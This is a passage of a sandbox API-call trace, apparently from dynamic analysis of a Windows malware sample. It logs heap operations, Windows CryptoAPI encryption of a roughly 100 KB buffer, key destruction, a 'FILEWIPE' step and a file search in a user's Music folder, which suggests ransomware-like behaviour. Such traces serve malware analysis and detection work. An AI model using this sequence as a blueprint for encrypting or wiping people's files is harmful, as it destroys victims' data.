lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0187.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0187.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0187.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0187.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0187.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.925] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0187.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0187.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0187.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0187.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0187.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0187.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0187.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0187.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0187.926] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0187.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0187.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0187.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0187.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.927] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0187.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0187.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0187.927] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0187.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0187.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0187.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0187.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0187.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0187.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0187.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0187.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0187.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0187.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0187.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0187.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0187.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0187.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0187.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0187.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0187.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0187.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0187.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0187.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0187.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0187.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0187.930] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.930] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c27f8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27f8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0187.930] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.931] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.931] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.931] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.931] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.931] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.931] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.931] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.931] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0187.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0187.931] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.931] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0187.931] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.931] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.931] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.931] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0187.931] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.932] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0187.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0187.932] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0187.932] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.932] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x18df5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x18e00) returned 1 [0187.932] CharLowerBuffW (in: lpsz="byte[101889]", cchLength=0xc | out: lpsz="byte[101889]") returned 0xc [0187.934] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.935] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.935] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa90c08*, pdwDataLen=0x87e820*=0x18df5, dwBufLen=0x18e00 | out: pbData=0xa90c08*, pdwDataLen=0x87e820*=0x18e00) returned 1 [0187.939] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0187.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.956] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0187.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.956] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.956] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.956] CryptDestroyKey (hKey=0x90af18) returned 1 [0187.973] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0187.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.973] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.973] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.973] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0187.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.973] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.974] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.974] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.974] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0187.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.974] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.974] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0187.974] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.974] FreeLibrary (hLibModule=0x74f20000) returned 1 [0187.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0187.976] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0187.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0187.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.976] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5c7070, ftCreationTime.dwHighDateTime=0x1d5d84f, ftLastAccessTime.dwLowDateTime=0x3e6d8870, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x3e6d8870, 